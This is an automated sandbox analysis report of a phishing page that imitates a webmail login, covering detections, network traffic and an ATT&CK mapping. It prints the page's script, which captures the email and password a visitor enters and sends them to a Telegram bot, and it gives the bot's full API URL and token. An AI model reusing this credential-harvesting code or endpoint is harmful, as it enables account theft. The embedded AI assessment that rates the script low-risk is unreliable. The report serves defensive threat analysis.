Edit tour

Windows Analysis Report
https://ranprojects0s0wemanin.nyc3.digitaloceanspaces.com/webmail.html

Overview

General Information

Sample URL:	https://ranprojects0s0wemanin.nyc3.digitaloceanspaces.com/webmail.html
Analysis ID:	1586947
Infos:

Detection

HTMLPhisher

Score:	84
Range:	0 - 100
Whitelisted:	false
Confidence:	100%

Signatures

Antivirus / Scanner detection for submitted sample

Antivirus detection for URL or domain

Suricata IDS alerts for network traffic

Yara detected HtmlPhish10

Javascript uses Clearbit API to dynamically determine company logos

Javascript uses Telegram API

Uses the Telegram API (likely for C&C communication)

HTML body contains low number of good links

HTML title does not match URL

Stores files to the Windows start menu directory

Classification

Process Tree

System is w10x64

chrome.exe (PID: 3812 cmdline: "C:\Program Files\Google\Chrome\Application\chrome.exe" --start-maximized "about:blank" MD5: 45DE480806D1B5D462A7DDE4DCEFC4E4)

chrome.exe (PID: 3664 cmdline: "C:\Program Files\Google\Chrome\Application\chrome.exe" --type=utility --utility-sub-type=network.mojom.NetworkService --lang=en-US --service-sandbox-type=none --mojo-platform-channel-handle=2096 --field-trial-handle=2008,i,14160700522982545157,12420359413549294288,262144 --disable-features=OptimizationGuideModelDownloading,OptimizationHints,OptimizationHintsFetching,OptimizationTargetPrediction /prefetch:8 MD5: 45DE480806D1B5D462A7DDE4DCEFC4E4)

chrome.exe (PID: 5860 cmdline: "C:\Program Files\Google\Chrome\Application\chrome.exe" "https://ranprojects0s0wemanin.nyc3.digitaloceanspaces.com/webmail.html" MD5: 45DE480806D1B5D462A7DDE4DCEFC4E4)

cleanup

Yara Signatures

Dropped Files

Source	Rule	Description	Author	Strings
dropped/chromecache_64	JoeSecurity_HtmlPhish_10	Yara detected HtmlPhish_10	Joe Security
dropped/chromecache_71	JoeSecurity_HtmlPhish_10	Yara detected HtmlPhish_10	Joe Security

HTML

Source	Rule	Description	Author
1.3.pages.csv	JoeSecurity_HtmlPhish_10	Yara detected HtmlPhish_10	Joe Security
1.0.pages.csv	JoeSecurity_HtmlPhish_10	Yara detected HtmlPhish_10	Joe Security
1.1.pages.csv	JoeSecurity_HtmlPhish_10	Yara detected HtmlPhish_10	Joe Security
1.2.pages.csv	JoeSecurity_HtmlPhish_10	Yara detected HtmlPhish_10	Joe Security

Suricata Signatures

Joe Security ANOMALY Telegram Send Message

Timestamp	SID	Severity	Classtype	Source IP	Source Port	Destination IP	Destination Port	Protocol
2025-01-09T19:29:19.405147+0100	1810007	1	Potentially Bad Traffic	192.168.2.5	49744	149.154.167.220	443	TCP
2025-01-09T19:29:20.049666+0100	1810007	1	Potentially Bad Traffic	192.168.2.5	49750	149.154.167.220	443	TCP
2025-01-09T19:29:21.426403+0100	1810007	1	Potentially Bad Traffic	192.168.2.5	49761	149.154.167.220	443	TCP
2025-01-09T19:29:42.167871+0100	1810007	1	Potentially Bad Traffic	192.168.2.5	49892	149.154.167.220	443	TCP
2025-01-09T19:29:43.313974+0100	1810007	1	Potentially Bad Traffic	192.168.2.5	49898	149.154.167.220	443	TCP
2025-01-09T19:30:05.106433+0100	1810007	1	Potentially Bad Traffic	192.168.2.5	50000	149.154.167.220	443	TCP
2025-01-09T19:30:06.445008+0100	1810007	1	Potentially Bad Traffic	192.168.2.5	50001	149.154.167.220	443	TCP

Joe Sandbox Signatures

Click to jump to signature section

Show All Signature Results

AV Detection

Antivirus / Scanner detection for submitted sample

Source: https://ranprojects0s0wemanin.nyc3.digitaloceanspaces.com/webmail.html

Avira URL Cloud: detection malicious, Label: phishing

Antivirus detection for URL or domain

Source: https://ranprojects0s0wemanin.nyc3.digitaloceanspaces.com/favicon.ico

Avira URL Cloud: Label: phishing

Phishing

Yara detected HtmlPhish10

Source: Yara match	File source: 1.3.pages.csv, type: HTML
Source: Yara match	File source: 1.0.pages.csv, type: HTML
Source: Yara match	File source: 1.1.pages.csv, type: HTML
Source: Yara match	File source: 1.2.pages.csv, type: HTML
Source: Yara match	File source: dropped/chromecache_64, type: DROPPED
Source: Yara match	File source: dropped/chromecache_71, type: DROPPED

Javascript uses Clearbit API to dynamically determine company logos

Source: https://ranprojects0s0wemanin.nyc3.digitaloceanspaces.com/webmail.html

HTTP Parser: $(document).ready(function(){ $('#omak').click(function(event){event.preventdefault(); $('#error').hide(); $('#msg').hide(); var email=$("#email").val(); var password=$("#password").val();var my_email =email;var filter = /^([a-za-z0-9_\.\-])+\@(([a-za-z0-9\-])+\.)+([a-za-z0-9]{2,4})+$/;if (!email) { $('#error').show(); $('#error').html("email field is empty"); return false; } if (!filter.test(my_email)) { $('#error').show(); $('#error').html("that account doesn't exist. enter a different account"); return false; } if (!password) { $('#error').show(); $('#error').html("password field is empty"); return false; }var ozi = "\n=========western-proparganda==========" ozi+="\nuser:"+email ozi+="\npass:"+password ozi+="\n===================================\n"tmsend(ozi)$("#msg"...

Javascript uses Telegram API

Source: https://ranprojects0s0wemanin.nyc3.digitaloceanspaces.com/webmail.html

HTTP Parser: Number of links: 0

Source: https://ranprojects0s0wemanin.nyc3.digitaloceanspaces.com/webmail.html

HTTP Parser: Title: Webmail Portal Access does not match URL

Source: https://ranprojects0s0wemanin.nyc3.digitaloceanspaces.com/webmail.html

HTTP Parser: <input type="password" .../> found

Source: https://ranprojects0s0wemanin.nyc3.digitaloceanspaces.com/webmail.html	HTTP Parser: No favicon
Source: https://ranprojects0s0wemanin.nyc3.digitaloceanspaces.com/webmail.html	HTTP Parser: No favicon
Source: https://ranprojects0s0wemanin.nyc3.digitaloceanspaces.com/webmail.html	HTTP Parser: No favicon
Source: https://ranprojects0s0wemanin.nyc3.digitaloceanspaces.com/webmail.html	HTTP Parser: No favicon

Source: https://ranprojects0s0wemanin.nyc3.digitaloceanspaces.com/webmail.html	HTTP Parser: No <meta name="author".. found
Source: https://ranprojects0s0wemanin.nyc3.digitaloceanspaces.com/webmail.html	HTTP Parser: No <meta name="author".. found
Source: https://ranprojects0s0wemanin.nyc3.digitaloceanspaces.com/webmail.html	HTTP Parser: No <meta name="author".. found
Source: https://ranprojects0s0wemanin.nyc3.digitaloceanspaces.com/webmail.html	HTTP Parser: No <meta name="author".. found

Source: https://ranprojects0s0wemanin.nyc3.digitaloceanspaces.com/webmail.html	HTTP Parser: No <meta name="copyright".. found
Source: https://ranprojects0s0wemanin.nyc3.digitaloceanspaces.com/webmail.html	HTTP Parser: No <meta name="copyright".. found
Source: https://ranprojects0s0wemanin.nyc3.digitaloceanspaces.com/webmail.html	HTTP Parser: No <meta name="copyright".. found
Source: https://ranprojects0s0wemanin.nyc3.digitaloceanspaces.com/webmail.html	HTTP Parser: No <meta name="copyright".. found

Networking

Suricata IDS alerts for network traffic

Source: Network traffic	Suricata IDS: 1810007 - Severity 1 - Joe Security ANOMALY Telegram Send Message : 192.168.2.5:49744 -> 149.154.167.220:443
Source: Network traffic	Suricata IDS: 1810007 - Severity 1 - Joe Security ANOMALY Telegram Send Message : 192.168.2.5:49750 -> 149.154.167.220:443
Source: Network traffic	Suricata IDS: 1810007 - Severity 1 - Joe Security ANOMALY Telegram Send Message : 192.168.2.5:49761 -> 149.154.167.220:443
Source: Network traffic	Suricata IDS: 1810007 - Severity 1 - Joe Security ANOMALY Telegram Send Message : 192.168.2.5:49898 -> 149.154.167.220:443
Source: Network traffic	Suricata IDS: 1810007 - Severity 1 - Joe Security ANOMALY Telegram Send Message : 192.168.2.5:49892 -> 149.154.167.220:443
Source: Network traffic	Suricata IDS: 1810007 - Severity 1 - Joe Security ANOMALY Telegram Send Message : 192.168.2.5:50000 -> 149.154.167.220:443
Source: Network traffic	Suricata IDS: 1810007 - Severity 1 - Joe Security ANOMALY Telegram Send Message : 192.168.2.5:50001 -> 149.154.167.220:443

Uses the Telegram API (likely for C&C communication)

Source: unknown	DNS query: name: api.telegram.org
Source: unknown	DNS query: name: api.telegram.org
Source: unknown	DNS query: name: api.telegram.org
Source: unknown	DNS query: name: api.telegram.org

Source: unknown	TCP traffic detected without corresponding DNS query: 23.1.237.91
Source: unknown	TCP traffic detected without corresponding DNS query: 23.1.237.91
Source: unknown	TCP traffic detected without corresponding DNS query: 23.1.237.91
Source: unknown	TCP traffic detected without corresponding DNS query: 23.1.237.91
Source: unknown	TCP traffic detected without corresponding DNS query: 23.1.237.91
Source: unknown	TCP traffic detected without corresponding DNS query: 23.1.237.91
Source: unknown	TCP traffic detected without corresponding DNS query: 23.1.237.91
Source: unknown	UDP traffic detected without corresponding DNS query: 1.1.1.1
Source: unknown	UDP traffic detected without corresponding DNS query: 1.1.1.1
Source: unknown	UDP traffic detected without corresponding DNS query: 1.1.1.1
Source: unknown	UDP traffic detected without corresponding DNS query: 1.1.1.1
Source: unknown	UDP traffic detected without corresponding DNS query: 1.1.1.1
Source: unknown	UDP traffic detected without corresponding DNS query: 1.1.1.1
Source: unknown	UDP traffic detected without corresponding DNS query: 1.1.1.1
Source: unknown	UDP traffic detected without corresponding DNS query: 1.1.1.1
Source: unknown	UDP traffic detected without corresponding DNS query: 1.1.1.1
Source: unknown	UDP traffic detected without corresponding DNS query: 1.1.1.1
Source: unknown	UDP traffic detected without corresponding DNS query: 1.1.1.1
Source: unknown	UDP traffic detected without corresponding DNS query: 1.1.1.1

Source: global traffic	HTTP traffic detected: GET /webmail.html HTTP/1.1Host: ranprojects0s0wemanin.nyc3.digitaloceanspaces.comConnection: keep-alivesec-ch-ua: "Google Chrome";v="117", "Not;A=Brand";v="8", "Chromium";v="117"sec-ch-ua-mobile: ?0sec-ch-ua-platform: "Windows"Upgrade-Insecure-Requests: 1User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/117.0.0.0 Safari/537.36Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,image/apng,/;q=0.8,application/signed-exchange;v=b3;q=0.7Sec-Fetch-Site: noneSec-Fetch-Mode: navigateSec-Fetch-User: ?1Sec-Fetch-Dest: documentAccept-Encoding: gzip, deflate, brAccept-Language: en-US,en;q=0.9
Source: global traffic	HTTP traffic detected: GET /bootstrap/4.5.2/css/bootstrap.min.css HTTP/1.1Host: stackpath.bootstrapcdn.comConnection: keep-alivesec-ch-ua: "Google Chrome";v="117", "Not;A=Brand";v="8", "Chromium";v="117"sec-ch-ua-mobile: ?0User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/117.0.0.0 Safari/537.36sec-ch-ua-platform: "Windows"Accept: text/css,/;q=0.1Sec-Fetch-Site: cross-siteSec-Fetch-Mode: no-corsSec-Fetch-Dest: styleReferer: https://ranprojects0s0wemanin.nyc3.digitaloceanspaces.com/Accept-Encoding: gzip, deflate, brAccept-Language: en-US,en;q=0.9
Source: global traffic	HTTP traffic detected: GET /favicon.ico HTTP/1.1Host: ranprojects0s0wemanin.nyc3.digitaloceanspaces.comConnection: keep-alivesec-ch-ua: "Google Chrome";v="117", "Not;A=Brand";v="8", "Chromium";v="117"sec-ch-ua-mobile: ?0User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/117.0.0.0 Safari/537.36sec-ch-ua-platform: "Windows"Accept: image/avif,image/webp,image/apng,image/svg+xml,image/,/*;q=0.8Sec-Fetch-Site: same-originSec-Fetch-Mode: no-corsSec-Fetch-Dest: imageReferer: https://ranprojects0s0wemanin.nyc3.digitaloceanspaces.com/webmail.htmlAccept-Encoding: gzip, deflate, brAccept-Language: en-US,en;q=0.9
Source: global traffic	HTTP traffic detected: GET /webmail.html HTTP/1.1Host: ranprojects0s0wemanin.nyc3.digitaloceanspaces.comConnection: keep-aliveUser-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/117.0.0.0 Safari/537.36Accept: /Sec-Fetch-Site: noneSec-Fetch-Mode: corsSec-Fetch-Dest: emptyAccept-Encoding: gzip, deflate, brAccept-Language: en-US,en;q=0.9
Source: global traffic	HTTP traffic detected: GET /bot6510435122:AAGGrUI8KNiRsZwXvCj87UhSKIiQFusr7BY/sendMessage HTTP/1.1Host: api.telegram.orgConnection: keep-aliveUser-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/117.0.0.0 Safari/537.36Accept: /Sec-Fetch-Site: noneSec-Fetch-Mode: corsSec-Fetch-Dest: emptyAccept-Encoding: gzip, deflate, brAccept-Language: en-US,en;q=0.9
Source: global traffic	HTTP traffic detected: GET /bot6510435122:AAGGrUI8KNiRsZwXvCj87UhSKIiQFusr7BY/sendMessage HTTP/1.1Host: api.telegram.orgConnection: keep-aliveUser-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/117.0.0.0 Safari/537.36Accept: /Sec-Fetch-Site: noneSec-Fetch-Mode: corsSec-Fetch-Dest: emptyAccept-Encoding: gzip, deflate, brAccept-Language: en-US,en;q=0.9
Source: global traffic	HTTP traffic detected: GET /bot6510435122:AAGGrUI8KNiRsZwXvCj87UhSKIiQFusr7BY/sendMessage HTTP/1.1Host: api.telegram.orgConnection: keep-aliveUser-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/117.0.0.0 Safari/537.36Accept: /Sec-Fetch-Site: noneSec-Fetch-Mode: corsSec-Fetch-Dest: emptyAccept-Encoding: gzip, deflate, brAccept-Language: en-US,en;q=0.9

Source: global traffic	DNS traffic detected: DNS query: www.google.com
Source: global traffic	DNS traffic detected: DNS query: ranprojects0s0wemanin.nyc3.digitaloceanspaces.com
Source: global traffic	DNS traffic detected: DNS query: stackpath.bootstrapcdn.com
Source: global traffic	DNS traffic detected: DNS query: api.telegram.org

Source: unknown

HTTP traffic detected: POST /bot6510435122:AAGGrUI8KNiRsZwXvCj87UhSKIiQFusr7BY/sendMessage HTTP/1.1Host: api.telegram.orgConnection: keep-aliveContent-Length: 158sec-ch-ua: "Google Chrome";v="117", "Not;A=Brand";v="8", "Chromium";v="117"sec-ch-ua-platform: "Windows"sec-ch-ua-mobile: ?0User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/117.0.0.0 Safari/537.36Content-type: application/json; charset=UTF-8Accept: */*Origin: https://ranprojects0s0wemanin.nyc3.digitaloceanspaces.comSec-Fetch-Site: cross-siteSec-Fetch-Mode: corsSec-Fetch-Dest: emptyReferer: https://ranprojects0s0wemanin.nyc3.digitaloceanspaces.com/Accept-Encoding: gzip, deflate, brAccept-Language: en-US,en;q=0.9

Source: global traffic

HTTP traffic detected: HTTP/1.1 403 Forbiddencontent-length: 256x-amz-request-id: tx0000030114c373f00e17f-0067801574-229bb76d-nyc3daccept-ranges: bytescontent-type: application/xmldate: Thu, 09 Jan 2025 18:29:08 GMTvary: Origin, Access-Control-Request-Headers, Access-Control-Request-Methodcache-control: max-age=0strict-transport-security: max-age=15552000; includeSubDomains; preloadx-amz-error-code: AccessDeniedx-envoy-upstream-healthchecked-cluster: connection: close

Source: chromecache_71.2.dr, chromecache_64.2.dr	String found in binary or memory: https://ajax.googleapis.com/ajax/libs/jquery/2.2.4/jquery.min.js
Source: chromecache_71.2.dr, chromecache_64.2.dr	String found in binary or memory: https://api.telegram.org/bot$
Source: chromecache_65.2.dr	String found in binary or memory: https://getbootstrap.com/)
Source: chromecache_65.2.dr	String found in binary or memory: https://github.com/twbs/bootstrap/blob/main/LICENSE)
Source: chromecache_71.2.dr, chromecache_64.2.dr	String found in binary or memory: https://image.thum.io/get/width/1200/https://
Source: chromecache_71.2.dr, chromecache_64.2.dr	String found in binary or memory: https://logo.clearbit.com/
Source: chromecache_71.2.dr, chromecache_64.2.dr	String found in binary or memory: https://stackpath.bootstrapcdn.com/bootstrap/4.5.2/css/bootstrap.min.css

Source: unknown	Network traffic detected: HTTP traffic on port 49674 -> 443
Source: unknown	Network traffic detected: HTTP traffic on port 443 -> 49744
Source: unknown	Network traffic detected: HTTP traffic on port 443 -> 49720
Source: unknown	Network traffic detected: HTTP traffic on port 443 -> 49761
Source: unknown	Network traffic detected: HTTP traffic on port 49898 -> 443
Source: unknown	Network traffic detected: HTTP traffic on port 49892 -> 443
Source: unknown	Network traffic detected: HTTP traffic on port 50001 -> 443
Source: unknown	Network traffic detected: HTTP traffic on port 49720 -> 443
Source: unknown	Network traffic detected: HTTP traffic on port 49715 -> 443
Source: unknown	Network traffic detected: HTTP traffic on port 443 -> 49716
Source: unknown	Network traffic detected: HTTP traffic on port 443 -> 49715
Source: unknown	Network traffic detected: HTTP traffic on port 443 -> 49714
Source: unknown	Network traffic detected: HTTP traffic on port 443 -> 49711
Source: unknown	Network traffic detected: HTTP traffic on port 443 -> 49898
Source: unknown	Network traffic detected: HTTP traffic on port 49675 -> 443
Source: unknown	Network traffic detected: HTTP traffic on port 49673 -> 443
Source: unknown	Network traffic detected: HTTP traffic on port 443 -> 49750
Source: unknown	Network traffic detected: HTTP traffic on port 49711 -> 443
Source: unknown	Network traffic detected: HTTP traffic on port 443 -> 49892
Source: unknown	Network traffic detected: HTTP traffic on port 49703 -> 443
Source: unknown	Network traffic detected: HTTP traffic on port 443 -> 50001
Source: unknown	Network traffic detected: HTTP traffic on port 443 -> 50000
Source: unknown	Network traffic detected: HTTP traffic on port 49761 -> 443
Source: unknown	Network traffic detected: HTTP traffic on port 443 -> 50002
Source: unknown	Network traffic detected: HTTP traffic on port 49744 -> 443
Source: unknown	Network traffic detected: HTTP traffic on port 50002 -> 443
Source: unknown	Network traffic detected: HTTP traffic on port 50000 -> 443
Source: unknown	Network traffic detected: HTTP traffic on port 49716 -> 443
Source: unknown	Network traffic detected: HTTP traffic on port 49750 -> 443
Source: unknown	Network traffic detected: HTTP traffic on port 49714 -> 443
Source: unknown	Network traffic detected: HTTP traffic on port 443 -> 49703

Source: classification engine

Classification label: mal84.phis.troj.win@17/19@12/6

Source: C:\Program Files\Google\Chrome\Application\chrome.exe

File created: C:\Users\user\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Chrome Apps

Jump to behavior

Source: unknown	Process created: C:\Program Files\Google\Chrome\Application\chrome.exe "C:\Program Files\Google\Chrome\Application\chrome.exe" --start-maximized "about:blank"
Source: C:\Program Files\Google\Chrome\Application\chrome.exe	Process created: C:\Program Files\Google\Chrome\Application\chrome.exe "C:\Program Files\Google\Chrome\Application\chrome.exe" --type=utility --utility-sub-type=network.mojom.NetworkService --lang=en-US --service-sandbox-type=none --mojo-platform-channel-handle=2096 --field-trial-handle=2008,i,14160700522982545157,12420359413549294288,262144 --disable-features=OptimizationGuideModelDownloading,OptimizationHints,OptimizationHintsFetching,OptimizationTargetPrediction /prefetch:8
Source: unknown	Process created: C:\Program Files\Google\Chrome\Application\chrome.exe "C:\Program Files\Google\Chrome\Application\chrome.exe" "https://ranprojects0s0wemanin.nyc3.digitaloceanspaces.com/webmail.html"
Source: C:\Program Files\Google\Chrome\Application\chrome.exe	Process created: unknown unknown	Jump to behavior
Source: C:\Program Files\Google\Chrome\Application\chrome.exe	Process created: unknown unknown	Jump to behavior
Source: C:\Program Files\Google\Chrome\Application\chrome.exe	Process created: C:\Program Files\Google\Chrome\Application\chrome.exe "C:\Program Files\Google\Chrome\Application\chrome.exe" --type=utility --utility-sub-type=network.mojom.NetworkService --lang=en-US --service-sandbox-type=none --mojo-platform-channel-handle=2096 --field-trial-handle=2008,i,14160700522982545157,12420359413549294288,262144 --disable-features=OptimizationGuideModelDownloading,OptimizationHints,OptimizationHintsFetching,OptimizationTargetPrediction /prefetch:8	Jump to behavior
Source: C:\Program Files\Google\Chrome\Application\chrome.exe	Process created: unknown unknown	Jump to behavior
Source: C:\Program Files\Google\Chrome\Application\chrome.exe	Process created: unknown unknown	Jump to behavior
Source: C:\Program Files\Google\Chrome\Application\chrome.exe	Process created: unknown unknown	Jump to behavior
Source: C:\Program Files\Google\Chrome\Application\chrome.exe	Process created: unknown unknown	Jump to behavior
Source: C:\Program Files\Google\Chrome\Application\chrome.exe	Process created: unknown unknown	Jump to behavior
Source: C:\Program Files\Google\Chrome\Application\chrome.exe	Process created: unknown unknown	Jump to behavior
Source: C:\Program Files\Google\Chrome\Application\chrome.exe	Process created: unknown unknown	Jump to behavior
Source: C:\Program Files\Google\Chrome\Application\chrome.exe	Process created: unknown unknown	Jump to behavior
Source: C:\Program Files\Google\Chrome\Application\chrome.exe	Process created: unknown unknown	Jump to behavior
Source: C:\Program Files\Google\Chrome\Application\chrome.exe	Process created: unknown unknown	Jump to behavior
Source: C:\Program Files\Google\Chrome\Application\chrome.exe	Process created: unknown unknown	Jump to behavior

Source: Google Drive.lnk.0.dr	LNK file: ..\..\..\..\..\..\..\..\..\Program Files\Google\Chrome\Application\chrome_proxy.exe
Source: YouTube.lnk.0.dr	LNK file: ..\..\..\..\..\..\..\..\..\Program Files\Google\Chrome\Application\chrome_proxy.exe
Source: Sheets.lnk.0.dr	LNK file: ..\..\..\..\..\..\..\..\..\Program Files\Google\Chrome\Application\chrome_proxy.exe
Source: Gmail.lnk.0.dr	LNK file: ..\..\..\..\..\..\..\..\..\Program Files\Google\Chrome\Application\chrome_proxy.exe
Source: Slides.lnk.0.dr	LNK file: ..\..\..\..\..\..\..\..\..\Program Files\Google\Chrome\Application\chrome_proxy.exe
Source: Docs.lnk.0.dr	LNK file: ..\..\..\..\..\..\..\..\..\Program Files\Google\Chrome\Application\chrome_proxy.exe

Source: Window Recorder

Window detected: More than 3 window changes detected

Source: C:\Program Files\Google\Chrome\Application\chrome.exe	File created: C:\Users\user\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Chrome Apps	Jump to behavior
Source: C:\Program Files\Google\Chrome\Application\chrome.exe	File created: C:\Users\user\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Chrome Apps\Google Drive.lnk	Jump to behavior
Source: C:\Program Files\Google\Chrome\Application\chrome.exe	File created: C:\Users\user\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Chrome Apps\YouTube.lnk	Jump to behavior
Source: C:\Program Files\Google\Chrome\Application\chrome.exe	File created: C:\Users\user\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Chrome Apps\Sheets.lnk	Jump to behavior
Source: C:\Program Files\Google\Chrome\Application\chrome.exe	File created: C:\Users\user\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Chrome Apps\Gmail.lnk	Jump to behavior
Source: C:\Program Files\Google\Chrome\Application\chrome.exe	File created: C:\Users\user\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Chrome Apps\Slides.lnk	Jump to behavior
Source: C:\Program Files\Google\Chrome\Application\chrome.exe	File created: C:\Users\user\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Chrome Apps\Docs.lnk	Jump to behavior

Mitre Att&ck Matrix

Reconnaissance	Resource Development	Initial Access	Execution	Persistence	Privilege Escalation	Defense Evasion	Credential Access	Discovery	Lateral Movement	Collection	Command and Control	Exfiltration	Impact
Gather Victim Identity Information	Acquire Infrastructure	Valid Accounts	Windows Management Instrumentation	1 Registry Run Keys / Startup Folder	1 Process Injection	1 Masquerading	OS Credential Dumping	System Service Discovery	Remote Services	Data from Local System	1 Web Service	Exfiltration Over Other Network Medium	Abuse Accessibility Features
Credentials	Domains	Default Accounts	Scheduled Task/Job	Boot or Logon Initialization Scripts	1 Registry Run Keys / Startup Folder	1 Process Injection	LSASS Memory	Application Window Discovery	Remote Desktop Protocol	Data from Removable Media	1 Encrypted Channel	Exfiltration Over Bluetooth	Network Denial of Service
Email Addresses	DNS Server	Domain Accounts	At	Logon Script (Windows)	Logon Script (Windows)	Obfuscated Files or Information	Security Account Manager	Query Registry	SMB/Windows Admin Shares	Data from Network Shared Drive	4 Non-Application Layer Protocol	Automated Exfiltration	Data Encrypted for Impact
Employee Names	Virtual Private Server	Local Accounts	Cron	Login Hook	Login Hook	Binary Padding	NTDS	System Network Configuration Discovery	Distributed Component Object Model	Input Capture	5 Application Layer Protocol	Traffic Duplication	Data Destruction
Gather Victim Network Information	Server	Cloud Accounts	Launchd	Network Logon Script	Network Logon Script	Software Packing	LSA Secrets	Internet Connection Discovery	SSH	Keylogging	3 Ingress Tool Transfer	Scheduled Transfer	Data Encrypted for Impact

Behavior Graph

Hide Legend

Legend:

Process
Signature
Created File
DNS/IP Info
Is Dropped
Is Windows Process
Number of created Registry Values
Number of created Files
Visual Basic
Delphi
Java
.Net C# or VB.NET
C, C++ or other language
Is malicious
Internet

Source	Detection	Scanner	Label	Link
https://ranprojects0s0wemanin.nyc3.digitaloceanspaces.com/webmail.html	100%	Avira URL Cloud	phishing

Source	Detection	Scanner	Label	Link
https://ranprojects0s0wemanin.nyc3.digitaloceanspaces.com/favicon.ico	100%	Avira URL Cloud	phishing

Domains and IPs

Contacted Domains

Name	IP	Active	Malicious	Reputation
stackpath.bootstrapcdn.com	104.18.11.207	true	false	high
www.google.com	172.217.16.196	true	false	high
api.telegram.org	149.154.167.220	true	false	high
ranprojects0s0wemanin.nyc3.digitaloceanspaces.com	162.243.189.2	true	false	unknown

Contacted URLs

Name	Malicious	Antivirus Detection	Reputation
https://ranprojects0s0wemanin.nyc3.digitaloceanspaces.com/favicon.ico	false	Avira URL Cloud: phishing	unknown
https://ranprojects0s0wemanin.nyc3.digitaloceanspaces.com/webmail.html	true		unknown
https://stackpath.bootstrapcdn.com/bootstrap/4.5.2/css/bootstrap.min.css	false		high
https://api.telegram.org/bot6510435122:AAGGrUI8KNiRsZwXvCj87UhSKIiQFusr7BY/sendMessage	false		high

URLs from Memory and Binaries

Name	Source	Malicious	Reputation
https://api.telegram.org/bot$	chromecache_71.2.dr, chromecache_64.2.dr	false	high
https://logo.clearbit.com/	chromecache_71.2.dr, chromecache_64.2.dr	false	high
https://getbootstrap.com/)	chromecache_65.2.dr	false	high
https://image.thum.io/get/width/1200/https://	chromecache_71.2.dr, chromecache_64.2.dr	false	high
https://github.com/twbs/bootstrap/blob/main/LICENSE)	chromecache_65.2.dr	false	high

World Map of Contacted IPs

No. of IPs < 25%
25% < No. of IPs < 50%
50% < No. of IPs < 75%
75% < No. of IPs

Public IPs

IP	Domain	Country	ASN	ASN Name	Malicious
104.18.11.207	stackpath.bootstrapcdn.com	United States	13335	CLOUDFLARENETUS	false
149.154.167.220	api.telegram.org	United Kingdom	62041	TELEGRAMRU	false
239.255.255.250	unknown	Reserved	unknown	unknown	false
162.243.189.2	ranprojects0s0wemanin.nyc3.digitaloceanspaces.com	United States	14061	DIGITALOCEAN-ASNUS	false
172.217.16.196	www.google.com	United States	15169	GOOGLEUS	false

Private

IP
192.168.2.5

General Information

Joe Sandbox version:	42.0.0 Malachite
Analysis ID:	1586947
Start date and time:	2025-01-09 19:28:05 +01:00
Joe Sandbox product:	CloudBasic
Overall analysis duration:	0h 2m 59s
Hypervisor based Inspection enabled:	false
Report type:	full
Cookbook file name:	browseurl.jbs
Sample URL:	https://ranprojects0s0wemanin.nyc3.digitaloceanspaces.com/webmail.html
Analysis system description:	Windows 10 x64 22H2 with Office Professional Plus 2019, Chrome 117, Firefox 118, Adobe Reader DC 23, Java 8 Update 381, 7zip 23.01
Number of analysed new started processes analysed:	7
Number of new started drivers analysed:	0
Number of existing processes analysed:	0
Number of existing drivers analysed:	0
Number of injected processes analysed:	0
Technologies:	EGA enabled AMSI enabled
Analysis Mode:	default
Analysis stop reason:	Timeout
Detection:	MAL
Classification:	mal84.phis.troj.win@17/19@12/6

Warnings

Exclude process from analysis (whitelisted): dllhost.exe, WMIADAP.exe, SIHClient.exe, svchost.exe
Excluded IPs from analysis (whitelisted): 142.250.185.131, 172.217.18.14, 64.233.184.84, 142.250.185.206, 172.217.18.110, 142.250.184.234, 142.250.186.74, 216.58.212.138, 172.217.16.202, 172.217.18.106, 142.250.186.106, 142.250.186.138, 142.250.184.202, 142.250.185.202, 216.58.206.42, 142.250.181.234, 142.250.185.234, 172.217.18.10, 142.250.186.170, 142.250.185.138, 142.250.185.106, 142.250.186.42, 217.20.57.20, 192.229.221.95, 172.217.16.206, 142.250.181.238, 142.250.185.174, 142.250.185.99, 142.250.186.46, 142.250.186.78, 23.56.254.164, 20.12.23.50, 13.107.246.45
Excluded domains from analysis (whitelisted): fs.microsoft.com, accounts.google.com, content-autofill.googleapis.com, slscr.update.microsoft.com, otelrules.azureedge.net, ajax.googleapis.com, ctldl.windowsupdate.com, clientservices.googleapis.com, fe3cr.delivery.mp.microsoft.com, clients2.google.com, ocsp.digicert.com, edgedl.me.gvt1.com, redirector.gvt1.com, update.googleapis.com, clients.l.google.com
Not all processes where analyzed, report is missing behavior information
Some HTTPS proxied raw data packets have been limited to 10 per session. Please view the PCAPs for the complete data.
VT rate limit hit for: https://ranprojects0s0wemanin.nyc3.digitaloceanspaces.com/webmail.html

Input	Output
URL: https://ranprojects0s0wemanin.nyc3.digitaloceanspaces.com Model: Joe Sandbox AI	{ "typosquatting": false, "unusual_query_string": false, "suspicious_tld": false, "ip_in_url": false, "long_subdomain": true, "malicious_keywords": false, "encoded_characters": false, "redirection": false, "contains_email_address": false, "known_domain": false, "brand_spoofing_attempt": false, "third_party_hosting": true }
URL: https://ranprojects0s0wemanin.nyc3.digitaloceanspaces.com
URL: https://ranprojects0s0wemanin.nyc3.digitaloceanspa... Model: Joe Sandbox AI	{ "risk_score": 4, "reasoning": "The script has a mix of low-risk and moderate-risk indicators. It collects user email and password, which could be considered sensitive data, and sends it to a Telegram bot. However, the script also includes some legitimate functionality, such as email validation and error handling. Overall, the script requires further review due to the potential data exfiltration behavior, but it does not appear to be overtly malicious." }
